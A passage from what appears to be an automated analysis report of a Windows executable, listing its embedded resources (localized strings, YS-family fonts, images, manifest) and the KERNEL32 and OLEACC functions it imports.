                                                                                                                      RT_STRING0x2c15880x488dataGermanGermany0.3612068965517241
                                                                                                                      RT_STRING0x2c1a100x408dataEnglishUnited States0.38856589147286824
                                                                                                                      RT_STRING0x2c1e180x4dedataFrenchFrance0.3434991974317817
                                                                                                                      RT_STRING0x2c22f80x434dataItalianItaly0.35315985130111527
                                                                                                                      RT_STRING0x2c272c0x260dataJapaneseJapan0.5970394736842105
                                                                                                                      RT_STRING0x2c298c0x43adataPortugueseBrazil0.3678373382624769
                                                                                                                      RT_STRING0x2c2dc80x39adataRussianRussia0.4164859002169197
                                                                                                                      RT_STRING0x2c31640x3fadataTurkishTurkey0.3929273084479371
                                                                                                                      RT_STRING0x2c35600x3ccdataUkrainianUkrain0.4269547325102881
                                                                                                                      RT_STRING0x2c392c0x3f8dataKazakhKazakhstan0.40255905511811024
                                                                                                                      RT_STRING0x2c3d240x3fadataUzbekItaly0.3889980353634578
                                                                                                                      RT_STRING0x2c41200x19cdataChineseChina0.6771844660194175
                                                                                                                      RT_STRING0x2c42bc0x446dataPortuguesePortugal0.376599634369287
                                                                                                                      RT_STRING0x2c47040x458data0.37050359712230213
                                                                                                                      RT_STRING0x2c4b5c0x126dataChineseTaiwan0.8707482993197279
                                                                                                                      RT_STRING0x2c4c840x37adataCzechCzech Republic0.4348314606741573
                                                                                                                      RT_STRING0x2c50000x3b8dataGermanGermany0.4054621848739496
                                                                                                                      RT_STRING0x2c53b80x2b8dataEnglishUnited States0.4482758620689655
                                                                                                                      RT_STRING0x2c56700x3b0dataFrenchFrance0.413135593220339
                                                                                                                      RT_STRING0x2c5a200x3b4dataItalianItaly0.39556962025316456
                                                                                                                      RT_STRING0x2c5dd40x1c6dataJapaneseJapan0.7268722466960352
                                                                                                                      RT_STRING0x2c5f9c0x36adataPortugueseBrazil0.4096109839816934
                                                                                                                      RT_STRING0x2c63080x384dataRussianRussia0.44555555555555554
                                                                                                                      RT_STRING0x2c668c0x398dataTurkishTurkey0.4380434782608696
                                                                                                                      RT_STRING0x2c6a240x394dataUkrainianUkrain0.44868995633187775
                                                                                                                      RT_STRING0x2c6db80x388dataKazakhKazakhstan0.4446902654867257
                                                                                                                      RT_STRING0x2c71400x3ecdataUzbekItaly0.3934262948207171
                                                                                                                      RT_STRING0x2c752c0x12cdataChineseChina0.84
                                                                                                                      RT_STRING0x2c76580x380dataPortuguesePortugal0.41629464285714285
                                                                                                                      RT_STRING0x2c79d80x376data0.41196388261851014
                                                                                                                      RT_STRING0x2c7d500x2bcdataChineseTaiwan0.6614285714285715
                                                                                                                      RT_STRING0x2c800c0x7c2AmigaOS bitmap font "h", fc_YSize 29440, 17152 elements, 2nd "c", 3rd "e"CzechCzech Republic0.3252769385699899
                                                                                                                      RT_STRING0x2c87d00x94edataGermanGermany0.2959697732997481
                                                                                                                      RT_STRING0x2c91200x73edataEnglishUnited States0.307982740021575
                                                                                                                      RT_STRING0x2c98600x996dataFrenchFrance0.267318663406683
                                                                                                                      RT_STRING0x2ca1f80x87cdataItalianItaly0.2960405156537753
                                                                                                                      RT_STRING0x2caa740x4f8dataJapaneseJapan0.4693396226415094
                                                                                                                      RT_STRING0x2caf6c0x862dataPortugueseBrazil0.2996272134203169
                                                                                                                      RT_STRING0x2cb7d00x7b4dataRussianRussia0.32454361054766734
                                                                                                                      RT_STRING0x2cbf840x784dataTurkishTurkey0.32744282744282743
                                                                                                                      RT_STRING0x2cc7080x79edataUkrainianUkrain0.3374358974358974
                                                                                                                      RT_STRING0x2ccea80x7b4dataKazakhKazakhstan0.3235294117647059
                                                                                                                      RT_STRING0x2cd65c0x7f6dataUzbekItaly0.30372914622178604
                                                                                                                      RT_STRING0x2cde540x2bcdataChineseChina0.6614285714285715
                                                                                                                      RT_STRING0x2ce1100x876dataPortuguesePortugal0.3079409048938135
                                                                                                                      RT_STRING0x2ce9880x8fedata0.290616854908775
                                                                                                                      RT_STRING0x2cf2880x206dataChineseTaiwan0.7355212355212355
                                                                                                                      RT_STRING0x2cf4900x5aedataCzechCzech Republic0.33700137551581844
                                                                                                                      RT_STRING0x2cfa400x788dataGermanGermany0.3112033195020747
                                                                                                                      RT_STRING0x2d01c80x65adataEnglishUnited States0.2865928659286593
                                                                                                                      RT_STRING0x2d08240x6f4dataFrenchFrance0.29044943820224717
                                                                                                                      RT_STRING0x2d0f180x6aadataItalianItaly0.2995310668229777
                                                                                                                      RT_STRING0x2d15c40x3ecdataJapaneseJapan0.48904382470119523
                                                                                                                      RT_STRING0x2d19b00x680dataPortugueseBrazil0.30709134615384615
                                                                                                                      RT_STRING0x2d20300x66adataRussianRussia0.31242387332521315
                                                                                                                      RT_STRING0x2d269c0x668dataTurkishTurkey0.3207317073170732
                                                                                                                      RT_STRING0x2d2d040x666dataUkrainianUkrain0.3144078144078144
                                                                                                                      RT_STRING0x2d336c0x652dataKazakhKazakhstan0.31087762669962915
                                                                                                                      RT_STRING0x2d39c00x6ecdataUzbekItaly0.28724604966139955
                                                                                                                      RT_STRING0x2d40ac0x206dataChineseChina0.6833976833976834
                                                                                                                      RT_STRING0x2d42b40x6bedataPortuguesePortugal0.3238702201622248
                                                                                                                      RT_STRING0x2d49740x710data0.31692477876106195
                                                                                                                      RT_STRING0x2d50840x1ecdataChineseTaiwan0.5955284552845529
                                                                                                                      RT_STRING0x2d52700x3e4dataCzechCzech Republic0.3684738955823293
                                                                                                                      RT_STRING0x2d56540x4a8dataGermanGermany0.3313758389261745
                                                                                                                      RT_STRING0x2d5afc0x39edataEnglishUnited States0.3347732181425486
                                                                                                                      RT_STRING0x2d5e9c0x44cdataFrenchFrance0.3209090909090909
                                                                                                                      RT_STRING0x2d62e80x41cdataItalianItaly0.3155893536121673
                                                                                                                      RT_STRING0x2d67040x284dataJapaneseJapan0.5760869565217391
                                                                                                                      RT_STRING0x2d69880x40edataPortugueseBrazil0.3246628131021195
                                                                                                                      RT_STRING0x2d6d980x3d4dataRussianRussia0.3469387755102041
                                                                                                                      RT_STRING0x2d716c0x3fadataTurkishTurkey0.3605108055009823
                                                                                                                      RT_STRING0x2d75680x3dcdataUkrainianUkrain0.3431174089068826
                                                                                                                      RT_STRING0x2d79440x3eadataKazakhKazakhstan0.3852295409181637
                                                                                                                      RT_STRING0x2d7d300x43cdataUzbekItaly0.34501845018450183
                                                                                                                      RT_STRING0x2d816c0x1e2dataChineseChina0.6182572614107884
                                                                                                                      RT_STRING0x2d83500x41edataPortuguesePortugal0.33586337760910817
                                                                                                                      RT_STRING0x2d87700x44cdata0.30272727272727273
                                                                                                                      RT_STRING0x2d8bbc0x2e2dataChineseTaiwan0.6300813008130082
                                                                                                                      RT_STRING0x2d8ea00x6b6dataCzechCzech Republic0.3370197904540163
                                                                                                                      RT_STRING0x2d95580x7acdataGermanGermany0.319755600814664
                                                                                                                      RT_STRING0x2d9d040x6acdataEnglishUnited States0.3120608899297424
                                                                                                                      RT_STRING0x2da3b00x83cdataFrenchFrance0.2903225806451613
                                                                                                                      RT_STRING0x2dabec0x738dataItalianItaly0.3051948051948052
                                                                                                                      RT_STRING0x2db3240x400dataJapaneseJapan0.5126953125
                                                                                                                      RT_STRING0x2db7240x786dataPortugueseBrazil0.3047767393561786
                                                                                                                      RT_STRING0x2dbeac0x6d2dataRussianRussia0.3293241695303551
                                                                                                                      RT_STRING0x2dc5800x73edataTurkishTurkey0.3284789644012945
                                                                                                                      RT_STRING0x2dccc00x6bedataUkrainianUkrain0.33371958285052145
                                                                                                                      RT_STRING0x2dd3800x75adataKazakhKazakhstan0.3443145589798087
                                                                                                                      RT_STRING0x2ddadc0x74edataUzbekItaly0.31016042780748665
                                                                                                                      RT_STRING0x2de22c0x2e2dataChineseChina0.6246612466124661
                                                                                                                      RT_STRING0x2de5100x770dataPortuguesePortugal0.3182773109243697
                                                                                                                      RT_STRING0x2dec800x7c2data0.3016112789526687
                                                                                                                      RT_STRING0x2df4440x11edataChineseTaiwan0.6398601398601399
                                                                                                                      RT_STRING0x2df5640x2e6dataCzechCzech Republic0.38005390835579517
                                                                                                                      RT_STRING0x2df84c0x38edataGermanGermany0.31758241758241756
                                                                                                                      RT_STRING0x2dfbdc0x2bcdataEnglishUnited States0.3485714285714286
                                                                                                                      RT_STRING0x2dfe980x350dataFrenchFrance0.3290094339622642
                                                                                                                      RT_STRING0x2e01e80x2f2dataItalianItaly0.35013262599469497
                                                                                                                      RT_STRING0x2e04dc0x1e2dataJapaneseJapan0.5124481327800829
                                                                                                                      RT_STRING0x2e06c00x312dataPortugueseBrazil0.3460559796437659
                                                                                                                      RT_STRING0x2e09d40x2aedataRussianRussia0.3979591836734694
                                                                                                                      RT_STRING0x2e0c840x2d0dataTurkishTurkey0.3527777777777778
                                                                                                                      RT_STRING0x2e0f540x2c2dataUkrainianUkrain0.4192634560906516
                                                                                                                      RT_STRING0x2e12180x2a2dataKazakhKazakhstan0.42433234421364985
                                                                                                                      RT_STRING0x2e14bc0x2f0dataUzbekItaly0.375
                                                                                                                      RT_STRING0x2e17ac0x11edataChineseChina0.6398601398601399
                                                                                                                      RT_STRING0x2e18cc0x2f2dataPortuguesePortugal0.35145888594164454
                                                                                                                      RT_STRING0x2e1bc00x30edata0.34271099744245526
                                                                                                                      RT_FONTDIR0x2e1ed00x1cadata0.7183406113537117
                                                                                                                      RT_FONT0x2e209c0x35ad4TrueType Font data, digitally signed, 17 tables, 1st "DSIG", 32 names, Macintosh, Copyright (c) 2022 Commercial Type, Inc. All rights reserved.YS GeoRegularCommercialType,Inc.: Y0.3771718366233057
                                                                                                                      RT_FONT0x317b700x39410TrueType Font data, digitally signed, 17 tables, 1st "DSIG", 32 names, Macintosh, Copyright (c) 2022 Commercial Type, Inc. All rights reserved.YS GeoMediumCommercialType,Inc.: YS0.39718649791908306
                                                                                                                      RT_FONT0x350f800x2617cTrueType Font data, digitally signed, 15 tables, 1st "DSIG", 14 names, Microsoft, language 0x409, Copyright (c) 2022 Commercial Type, Inc. All rights reserved.YS TextRegular1.001;COMM;YSText-Reg0.4265388263644987
                                                                                                                      RT_RCDATA0x3770fc0x2d6PNG image data, 410 x 186, 8-bit colormap, non-interlaced0.7121212121212122
                                                                                                                      RT_RCDATA0x3773d40xfdPNG image data, 360 x 28, 8-bit/color RGBA, non-interlaced0.924901185770751
                                                                                                                      RT_RCDATA0x3774d40xecPNG image data, 360 x 28, 8-bit gray+alpha, non-interlaced0.9788135593220338
                                                                                                                      RT_RCDATA0x3775c00x28dPNG image data, 96 x 16, 8-bit/color RGBA, non-interlaced1.0168453292496171
                                                                                                                      RT_RCDATA0x3778500x4d8PNG image data, 192 x 32, 8-bit/color RGBA, non-interlaced1.0088709677419354
                                                                                                                      RT_RCDATA0x377d280x141f4JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 802x430, components 30.8583474884736715
                                                                                                                      RT_RCDATA0x38bf1c0x3bb9eJPEG image data, JFIF standard 1.02, resolution (DPI), density 144x144, segment length 16, baseline, precision 8, 1604x860, components 30.8223211438942437
                                                                                                                      RT_RCDATA0x3c7abc0x1e2f8JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 802x430, components 30.9196861857004206
                                                                                                                      RT_RCDATA0x3e5db40x4e14eJPEG image data, JFIF standard 1.02, resolution (DPI), density 144x144, segment length 16, baseline, precision 8, 1604x860, components 30.8874936683530213
                                                                                                                      RT_RCDATA0x433f040x1ce24JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 802x430, components 30.917309057713764
                                                                                                                      RT_RCDATA0x450d280x4a746JPEG image data, JFIF standard 1.02, resolution (DPI), density 144x144, segment length 16, baseline, precision 8, 1604x860, components 30.8811113370015018
                                                                                                                      RT_RCDATA0x49b4700x350PNG image data, 60 x 20, 8-bit/color RGBA, non-interlaced1.0129716981132075
                                                                                                                      RT_RCDATA0x49b7c00x5e5PNG image data, 120 x 40, 8-bit/color RGBA, non-interlaced1.0072895957587806
                                                                                                                      RT_RCDATA0x49bda80x99PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced0.9869281045751634
                                                                                                                      RT_RCDATA0x49be440x119PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced1.0213523131672597
                                                                                                                      RT_RCDATA0x49bf600x20cPNG image data, 60 x 20, 8-bit/color RGBA, non-interlaced1.0209923664122138
                                                                                                                      RT_RCDATA0x49c16c0x399PNG image data, 120 x 40, 8-bit/color RGBA, non-interlaced1.011943539630836
                                                                                                                      RT_RCDATA0x49c5080x71PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced0.9823008849557522
                                                                                                                      RT_RCDATA0x49c57c0x81PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced1.0
                                                                                                                      RT_RCDATA0x49c6000xc4PNG image data, 393 x 4, 8-bit/color RGBA, non-interlaced1.0051020408163265
                                                                                                                      RT_RCDATA0x49c6c40x11dPNG image data, 786 x 8, 8-bit/color RGBA, non-interlaced1.0035087719298246
                                                                                                                      RT_RCDATA0x49c7e40xcbPNG image data, 393 x 4, 8-bit/color RGBA, non-interlaced1.0147783251231528
                                                                                                                      RT_RCDATA0x49c8b00x129PNG image data, 786 x 8, 8-bit/color RGBA, non-interlaced0.9966329966329966
                                                                                                                      RT_RCDATA0x49c9dc0x176d3PNG image data, 802 x 430, 8-bit/color RGBA, non-interlaced0.9820436663019123
                                                                                                                      RT_RCDATA0x4b40b00x53b14PNG image data, 1604 x 860, 8-bit/color RGBA, non-interlaced0.9734192133113966
                                                                                                                      RT_RCDATA0x507bc40x19747PNG image data, 802 x 430, 8-bit/color RGBA, non-interlaced0.9873301171076988
                                                                                                                      RT_RCDATA0x52130c0x4fe3dPNG image data, 1604 x 860, 8-bit/color RGBA, non-interlaced0.9762826644337758
                                                                                                                      RT_RCDATA0x57114c0x19365PNG image data, 802 x 430, 8-bit/color RGBA, non-interlaced0.9881571429954779
                                                                                                                      RT_RCDATA0x58a4b40x4f7f2PNG image data, 1604 x 860, 8-bit/color RGBA, non-interlaced0.9764263646358616
                                                                                                                      RT_RCDATA0x5d9ca80x2b4PNG image data, 460 x 234, 8-bit/color RGB, non-interlaced0.18641618497109827
                                                                                                                      RT_RCDATA0x5d9f5c0x23bPNG image data, 300 x 35, 8-bit/color RGBA, non-interlaced0.9929947460595446
                                                                                                                      RT_RCDATA0x5da1980x4f3PNG image data, 600 x 70, 8-bit/color RGBA, non-interlaced0.9344909234411997
                                                                                                                      RT_RCDATA0x5da68c0x23ePNG image data, 300 x 35, 8-bit/color RGBA, non-interlaced1.0
                                                                                                                      RT_RCDATA0x5da8cc0x4fcPNG image data, 600 x 70, 8-bit/color RGBA, non-interlaced0.9365203761755486
                                                                                                                      RT_RCDATA0x5dadc80x154PNG image data, 60 x 20, 8-bit/color RGBA, non-interlaced1.026470588235294
                                                                                                                      RT_RCDATA0x5daf1c0x2c7PNG image data, 120 x 40, 8-bit/color RGBA, non-interlaced0.9817158931082982
                                                                                                                      RT_RCDATA0x5db1e40x3ebPNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced1.0109670987038883
                                                                                                                      RT_RCDATA0x5db5d00x491PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced1.009409751924722
                                                                                                                      RT_RCDATA0x5dba640x440PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced1.010110294117647
                                                                                                                      RT_RCDATA0x5dbea40x463PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced1.0097951914514693
                                                                                                                      RT_RCDATA0x5dc3080xe8PNG image data, 18 x 400, 8-bit/color RGBA, non-interlaced0.6422413793103449
                                                                                                                      RT_RCDATA0x5dc3f00xd8PNG image data, 852 x 18, 8-bit/color RGBA, non-interlaced0.9212962962962963
                                                                                                                      RT_RCDATA0x5dc4c80xecPNG image data, 18 x 400, 8-bit/color RGBA, non-interlaced0.635593220338983
                                                                                                                      RT_RCDATA0x5dc5b40xdfPNG image data, 852 x 18, 8-bit/color RGBA, non-interlaced0.905829596412556
                                                                                                                      RT_RCDATA0x5dc6940xadPNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced1.0057803468208093
                                                                                                                      RT_RCDATA0x5dc7440xbePNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced1.0157894736842106
                                                                                                                      RT_RCDATA0x5dc8040xcaPNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced1.0247524752475248
                                                                                                                      RT_RCDATA0x5dc8d00xbbPNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced1.0213903743315509
                                                                                                                      RT_RCDATA0x5dc98c0x15fPNG image data, 18 x 464, 8-bit/color RGBA, non-interlaced0.7578347578347578
                                                                                                                      RT_RCDATA0x5dcaec0x13ePNG image data, 916 x 18, 8-bit/color RGBA, non-interlaced0.9716981132075472
                                                                                                                      RT_RCDATA0x5dcc2c0x156PNG image data, 18 x 464, 8-bit/color RGBA, non-interlaced0.7426900584795322
                                                                                                                      RT_RCDATA0x5dcd840x134PNG image data, 916 x 18, 8-bit/color RGBA, non-interlaced0.974025974025974
                                                                                                                      RT_RCDATA0x5dceb80x495PNG image data, 420 x 48, 8-bit/color RGBA, non-interlaced0.9411764705882353
                                                                                                                      RT_RCDATA0x5dd3500x619PNG image data, 160 x 22, 8-bit/color RGBA, non-interlaced1.0070467648942985
                                                                                                                      RT_RCDATA0x5dd96c0xd0ePNG image data, 320 x 40, 8-bit/color RGBA, non-interlaced1.0032914422501495
                                                                                                                      RT_RCDATA0x5de67c0x61dPNG image data, 160 x 22, 8-bit/color RGBA, non-interlaced1.0070287539936102
                                                                                                                      RT_RCDATA0x5dec9c0xd41PNG image data, 320 x 40, 8-bit/color RGBA, non-interlaced1.0032419687592102
                                                                                                                      RT_RCDATA0x5df9e00x292PNG image data, 17 x 17, 8-bit/color RGBA, non-interlaced1.0167173252279635
                                                                                                                      RT_RCDATA0x5dfc740x2a1PNG image data, 17 x 17, 8-bit/color RGBA, non-interlaced1.0163447251114412
                                                                                                                      RT_RCDATA0x5dff180x2e6PNG image data, 17 x 17, 8-bit/color RGBA, non-interlaced1.0148247978436657
                                                                                                                      RT_RCDATA0x5e02000x2bbPNG image data, 17 x 17, 8-bit/color RGBA, non-interlaced1.0157367668097281
                                                                                                                      RT_RCDATA0x5e04bc0xf40PNG image data, 9 x 412, 8-bit/color RGBA, non-interlaced0.9943647540983607
                                                                                                                      RT_RCDATA0x5e13fc0xa89PNG image data, 784 x 9, 8-bit/color RGBA, non-interlaced0.9773822766036336
                                                                                                                      RT_RCDATA0x5e1e880xddbPNG image data, 9 x 412, 8-bit/color RGBA, non-interlaced0.9952072173667889
                                                                                                                      RT_RCDATA0x5e2c640xa74PNG image data, 784 x 9, 8-bit/color RGBA, non-interlaced0.9775784753363229
                                                                                                                      RT_RCDATA0x5e36d80x744PNG image data, 34 x 34, 8-bit/color RGBA, non-interlaced1.0059139784946236
                                                                                                                      RT_RCDATA0x5e3e1c0x77bPNG image data, 34 x 34, 8-bit/color RGBA, non-interlaced1.0057441253263708
                                                                                                                      RT_RCDATA0x5e45980x810PNG image data, 34 x 34, 8-bit/color RGBA, non-interlaced1.005329457364341
                                                                                                                      RT_RCDATA0x5e4da80x823PNG image data, 34 x 34, 8-bit/color RGBA, non-interlaced1.0052808449351895
                                                                                                                      RT_RCDATA0x5e55cc0x2082PNG image data, 18 x 824, 8-bit/color RGBA, non-interlaced0.9595049267003124
                                                                                                                      RT_RCDATA0x5e76500x1a36PNG image data, 1568 x 18, 8-bit/color RGBA, non-interlaced0.9077496274217586
                                                                                                                      RT_RCDATA0x5e90880x1fe6PNG image data, 18 x 824, 8-bit/color RGBA, non-interlaced0.9605682096497673
                                                                                                                      RT_RCDATA0x5eb0700x19b2PNG image data, 1568 x 18, 8-bit/color RGBA, non-interlaced0.9165399817573731
                                                                                                                      RT_RCDATA0x5eca240x239PNG image data, 17 x 17, 8-bit/color RGBA, non-interlaced1.0193321616871704
                                                                                                                      RT_RCDATA0x5ecc600x208PNG image data, 17 x 17, 8-bit/color RGBA, non-interlaced1.021153846153846
                                                                                                                      RT_RCDATA0x5ece680x22cPNG image data, 17 x 17, 8-bit/color RGBA, non-interlaced1.0197841726618706
                                                                                                                      RT_RCDATA0x5ed0940x249PNG image data, 17 x 17, 8-bit/color RGBA, non-interlaced1.0188034188034187
                                                                                                                      RT_RCDATA0x5ed2e00x5e7PNG image data, 34 x 34, 8-bit/color RGBA, non-interlaced1.0072799470549305
                                                                                                                      RT_RCDATA0x5ed8c80x565PNG image data, 34 x 34, 8-bit/color RGBA, non-interlaced1.007965242577842
                                                                                                                      RT_RCDATA0x5ede300x62cPNG image data, 34 x 34, 8-bit/color RGBA, non-interlaced1.0069620253164557
                                                                                                                      RT_RCDATA0x5ee45c0x6f5PNG image data, 34 x 34, 8-bit/color RGBA, non-interlaced1.0061763054463784
                                                                                                                      RT_RCDATA0x5eeb540x3ac0cJPEG image data, JFIF standard 1.02, resolution (DPI), density 144x144, segment length 16, baseline, precision 8, 1604x860, components 30.8211109818326878
                                                                                                                      RT_RCDATA0x6297600x64c73PNG image data, 1604 x 860, 8-bit/color RGBA, non-interlaced0.9758955587264134
                                                                                                                      RT_RCDATA0x68e3d40x5b6ecJPEG image data, JFIF standard 1.02, resolution (DPI), density 144x144, segment length 16, baseline, precision 8, 1604x860, components 30.8941865060292437
                                                                                                                      RT_RCDATA0x6e9ac00x5937fJPEG image data, JFIF standard 1.02, resolution (DPI), density 144x144, segment length 16, baseline, precision 8, 1604x860, components 30.8907314216599761
                                                                                                                      RT_RCDATA0x742e400x76537PNG image data, 1604 x 860, 8-bit/color RGBA, non-interlaced0.9826167873347047
                                                                                                                      RT_RCDATA0x7b93780x75b99PNG image data, 1604 x 860, 8-bit/color RGBA, non-interlaced0.982486556436009
                                                                                                                      RT_RCDATA0x82ef140x89ePNG image data, 840 x 96, 8-bit/color RGBA, non-interlaced0.8952855847688124
                                                                                                                      RT_RCDATA0x82f7b40x5bdPNG image data, 120 x 40, 8-bit/color RGBA, non-interlaced1.0074880871341048
                                                                                                                      RT_RCDATA0x82fd740x15ePNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced1.0171428571428571
                                                                                                                      RT_RCDATA0x82fed40x310PNG image data, 120 x 40, 8-bit/color RGBA, non-interlaced1.0140306122448979
                                                                                                                      RT_RCDATA0x8301e40xaaPNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced0.9764705882352941
                                                                                                                      RT_RCDATA0x8302900x523PNG image data, 192 x 32, 8-bit/color RGBA, non-interlaced1.0083650190114068
                                                                                                                      RT_RCDATA0x8307b40x104PNG image data, 786 x 8, 8-bit/color RGBA, non-interlaced0.9923076923076923
                                                                                                                      RT_RCDATA0x8308b80xfcPNG image data, 786 x 8, 8-bit/color RGBA, non-interlaced0.996031746031746
                                                                                                                      RT_RCDATA0x8309b40xe27PNG image data, 320 x 40, 8-bit/color RGBA, non-interlaced1.0030361578802098
                                                                                                                      RT_RCDATA0x8317dc0xe56PNG image data, 320 x 40, 8-bit/color RGBA, non-interlaced1.0029972752043597
                                                                                                                      RT_RCDATA0x8326340x789PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0057024364955935
                                                                                                                      RT_RCDATA0x832dc00x7b3PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0055809233891426
                                                                                                                      RT_RCDATA0x8335740x7c4PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.005533199195171
                                                                                                                      RT_RCDATA0x833d380x7cePNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0055055055055055
                                                                                                                      RT_RCDATA0x8345080x2241PNG image data, 16 x 828, 8-bit/color RGBA, non-interlaced0.9470863268331623
                                                                                                                      RT_RCDATA0x83674c0x16ecPNG image data, 1572 x 16, 8-bit/color RGBA, non-interlaced0.9164962508520791
                                                                                                                      RT_RCDATA0x837e380x23efPNG image data, 16 x 828, 8-bit/color RGBA, non-interlaced0.9458636808348734
                                                                                                                      RT_RCDATA0x83a2280x1ccfPNG image data, 1572 x 16, 8-bit/color RGBA, non-interlaced0.9114576271186441
                                                                                                                      RT_RCDATA0x83bef80x6e5PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0062322946175637
                                                                                                                      RT_RCDATA0x83c5e00x74dPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0058855002675227
                                                                                                                      RT_RCDATA0x83cd300x72fPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0059815116911366
                                                                                                                      RT_RCDATA0x83d4600x763PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0058170280274987
                                                                                                                      RT_RCDATA0x83dbc40x142cfJPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 802x430, components 30.8580573337044253
                                                                                                                      RT_RCDATA0x851e940x3bfbfJPEG image data, JFIF standard 1.02, resolution (DPI), density 144x144, segment length 16, baseline, precision 8, 1604x860, components 30.8232808970471519
                                                                                                                      RT_RCDATA0x88de540x17789PNG image data, 802 x 430, 8-bit/color RGBA, non-interlaced0.9800597064605719
                                                                                                                      RT_RCDATA0x8a55e00x540c1PNG image data, 1604 x 860, 8-bit/color RGBA, non-interlaced0.9740136003044237
                                                                                                                      RT_RCDATA0x8f96a40x394f0JPEG image data, JFIF standard 1.02, resolution (DPI), density 144x144, segment length 16, baseline, precision 8, 1604x860, components 30.8163596551019017
                                                                                                                      RT_RCDATA0x932b940x62f65PNG image data, 1604 x 860, 8-bit/color RGBA, non-interlaced0.9758356379317575
                                                                                                                      RT_GROUP_ICON0x995afc0x5adata0.7444444444444445
                                                                                                                      RT_VERSION0x995b580x488dataEnglishUnited States0.43448275862068964
                                                                                                                      RT_MANIFEST0x995fe00x4aeXML 1.0 document, ASCII text, with very long lines (1084)EnglishUnited States0.5058430717863105

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      KERNEL32.dllAcquireSRWLockExclusive, AssignProcessToJobObject, CloseHandle, CompareStringW, CopyFileW, CreateDirectoryW, CreateEventA, CreateEventW, CreateFileMappingW, CreateFileW, CreateMutexW, CreateProcessW, CreateThread, CreateToolhelp32Snapshot, DecodePointer, DeleteCriticalSection, DeleteFileW, DeleteProcThreadAttributeList, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, ExpandEnvironmentStringsW, FileTimeToSystemTime, FindClose, FindFirstFileExW, FindNextFileW, FindResourceExW, FindResourceW, FlushFileBuffers, FormatMessageA, FormatMessageW, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetDateFormatW, GetDiskFreeSpaceExW, GetDriveTypeW, GetEnvironmentStringsW, GetEnvironmentVariableW, GetExitCodeProcess, GetFileAttributesExW, GetFileAttributesW, GetFileInformationByHandle, GetFileSize, GetFileSizeEx, GetFileType, GetFullPathNameW, GetGeoInfoW, GetLastError, GetLocalTime, GetLocaleInfoW, GetLogicalDriveStringsW, GetLongPathNameW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOEMCP, GetProcAddress, GetProcessHeap, GetProcessId, GetProductInfo, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemDirectoryW, GetSystemInfo, GetSystemTimeAsFileTime, GetTempFileNameW, GetTempPathW, GetThreadPriority, GetTickCount, GetTimeFormatW, GetTimeZoneInformation, GetUserDefaultLCID, GetUserDefaultLangID, GetUserDefaultUILanguage, GetUserGeoID, GetVersionExW, GetWindowsDirectoryW, GlobalAlloc, GlobalFree, GlobalLock, GlobalUnlock, HeapAlloc, HeapFree, InitOnceExecuteOnce, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeProcThreadAttributeList, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, IsWow64Process, K32GetMappedFileNameW, K32GetProcessMemoryInfo, LCMapStringW, LeaveCriticalSection, LoadLibraryExA, LoadLibraryExW, LoadLibraryW, LoadResource, LocalFree, LockFile, LockResource, MapViewOfFile, MoveFileExW, MoveFileW, MultiByteToWideChar, OpenEventA, OpenEventW, OpenProcess, OutputDebugStringA, OutputDebugStringW, Process32FirstW, Process32NextW, QueryDosDeviceW, QueryPerformanceCounter, QueryPerformanceFrequency, QueryThreadCycleTime, QueryUnbiasedInterruptTime, RaiseException, ReOpenFile, ReadConsoleW, ReadFile, ReleaseMutex, ReleaseSRWLockExclusive, RemoveDirectoryW, ReplaceFileW, ResetEvent, RtlCaptureStackBackTrace, RtlUnwind, SetDllDirectoryW, SetEndOfFile, SetEnvironmentVariableW, SetEvent, SetFileAttributesW, SetFilePointer, SetFilePointerEx, SetHandleInformation, SetLastError, SetStdHandle, SetThreadPriority, SetUnhandledExceptionFilter, SizeofResource, Sleep, SleepConditionVariableSRW, SystemTimeToTzSpecificLocalTime, TerminateProcess, TerminateThread, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, UnlockFile, UnmapViewOfFile, UpdateProcThreadAttribute, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, VirtualQueryEx, WaitForMultipleObjects, WaitForSingleObject, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile, lstrcmpA, lstrcpynW, lstrlenW
                                                                                                                      OLEACC.dllAccessibleObjectFromWindow, LresultFromObject

                                                                                                                      Exports

                                                                                                                      NameOrdinalAddress
